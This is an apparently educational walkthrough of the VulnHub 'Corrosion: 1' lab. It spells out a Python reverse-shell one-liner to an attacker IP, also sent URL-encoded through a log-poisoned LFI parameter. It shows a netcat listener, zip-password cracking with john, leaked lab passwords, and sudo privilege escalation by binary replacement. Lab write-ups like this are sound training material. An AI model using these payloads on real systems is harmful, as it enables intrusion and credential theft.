Capture the flag (CTF)

CORROSION: 1 VulnHub CTF Walkthrough Part 2

In the previous part of the CTF, we did the parameter fuzzing on the identified files, leading us to identify a Local File Inclusion (LFI) vulnerability. After that, we used the SSH log poisoning attack to exploit the LFI, giving us the command execution shell on the target machine. The steps which were covered in the previous part are given below. 

1. Getting the IP address with the Netdiscover utility
2. Getting open port details by using the Nmap tool
3. Enumerating HTTP service with Dirb utility
4. Parameter fuzzing with FFUF tool
5. SSH log poisoning attack and command execution

We would recommend reading Part 1 of the CTF for better understanding. The Part 1 URL is given in the reference. In this part, we will be continuing from command execution, and the steps we will be covering in this CTG are given below. 

1. Taking Reverse Shell with Python
2. Cracking the zip password with John the Rippler
3. Escalating privileges to read the user flag
4. Escalating privileges and reading the root flag

Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The walkthrough

Step 6

Till now, we have a command execution shell on the target machine. Now multiple ways can be used to take the reverse connection. However, we would be using python reverse connection payload to take the connection. The python reverse connection payload can be seen in the below screenshot: 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.23",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

In this payload, we added our attacker machine IP as 192.168.1.23 and port 1234. It means when the payload is executed, it will give the reverse connection on the mentioned IP address. (You can change this IP Address and port number as per our network configuration) 

Before executing the reverse shell payload, we configured Netcut on our attacker machine to listen to port 1234. 

Command used: 

• << nc -lvp 1234 >>
• << http://192.168.1.16/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.23",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' >>

We entered the payload in the ‘cmd’ get parameter value. This provided the reverse shell access to the target machine on our NetCut terminal window. However, it was limited shell access. We had to run a few more commands for a stable shell, as seen below. 

Command used: 

• << python3 -c 'import pty;pty.spawn("/bin/bash")' >>
• << export TERM=screen >>
• << cat /etc/issue >>
• << uname –a >>

After gaining access to the target machine, we first ran a few commands to gather the operating system and kernel version information. We researched the web for an available exploit, but none could be found. We started exploring various directories on the target machine and soon found an interesting file. 

Command used: << ls -la >>

In the above screenshot, we can see that we have found a compressed file in the ‘/backups’ folder. Let us decompress the file to see the contents. 

Command used: << unzip user_backup.zip >>

We used the ‘unzip’ command to extract the file contents. However, the file seems protected as it asked for a password. We tried various random keywords, but none could work. So, we decided to download the compressed file on our attacker machine for further analysis. 

Command used: 

• << python3 -m http.server 8002 >>
• << wget http://192.168.1.16:8002/user_backup.zip >>

We used the python service to enable the file to be downloaded through the HTTP port 8002. Next, we downloaded the file on our attacker machine using the wget utility. In the next step, we will use John the Ripper tool to crack the zip password. 

Step 7

John the Ripper is one of the best tools pre-installed in Kali Linux for password cracking. It generally used brute force or dictionary techniques to crack the password. We decided to use John the Ripper for cracking the compressed file password. We need to extract the hash from the zip file, which is seen in the screenshot below. 

Command used: << zip2john user_backup.zip > hash >>

We used the zip2john utility to extract the file into a hashed format to make it compatible with the password cracking tool ‘john.’ We saved the hashed zip file as ‘hash.’ Let us use the john password cracking tool for cracking the password for ‘hash.’ 

Command used: 

<< john hash --wordlist=/usr/share/wordlists/rockyou.txt >>

We used the default wordlist ‘rockyou.txt’ for this purpose. After some time, the password was cracked by the tool. The identified password is given below for reference: 

!randybaby

Let us extract the file contents by providing the above password. 

Command used: << unzip user_backup.zip >>

We used the ‘unzip’ command to extract the file contents, this time, the file was extracted successfully as we had the password. A new text file ‘new_user.txt’ was identified, which contained a password as given below: 

randylovesgoldfish1998

Now we know one more password. So, we will use this password to escalate our privileges to read the flag in the next step. 

Step 8

As we already know, there is a user named ‘randy’ on the target machine, so let us log into the target machine as user randy by providing the above password. 

Command used: << cat user.txt >>

We used the ‘su’ command to switch the current user to randy. The user escalation was successful, and now we are logged in as user ‘randy.’ We checked the randy directory where we found our first user flag. Since the target was to get the root access, we still need to do some more enumeration and exploitation to become the root, which we will be doing in the next step. 

Step 9

Till now, we got user access on the target machine. Since this is the new user, we rechecked the sudo permissions by running the sudo -l command. The output of the command can be seen in the following screenshot. 

Command used: << sudo -l >>

We found a file that can be run with sudo permissions. Let us read the binary file to determine whether we can get the root through this file. 

Command used: 

• << cat easysysteminfo.py >>
• << ls -la >>

In the above screenshot, we can see that the binary does not contain any functionality which could help us get the root. Also, we do not have editing permissions for this file. However, we have permission to replace the file with another. 

Command used: 

• << cat >> infosec.c >>
• << gcc infosec.c -o easysysinfo >>
• << sudo /home/randy/tools/easysysinfo >>

We wrote a custom binary code and saved it as ‘infosec.c’ on the target machine. Next, we compiled the code using the ‘gcc’ compiler and saved it as ‘easysysinfo.’ After that, we executed the file using sudo that allowed root access to the target machine. The user access was verified by running the ‘id’ command. Let us read the flag file and complete the challenge. 

Command used: 

• << cd /root >>
• << cat root.txt >>

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

The root flag was found in the root directory, which can be seen above. This marks the completion of this challenge. The key was to understand the hints and crack the zip file. I hope you enjoyed solving this CTF. 

 

Sources:

• Corrosion, Vulnhub
• Corrosion, Vulnhub
• Corrosion, Vulnhub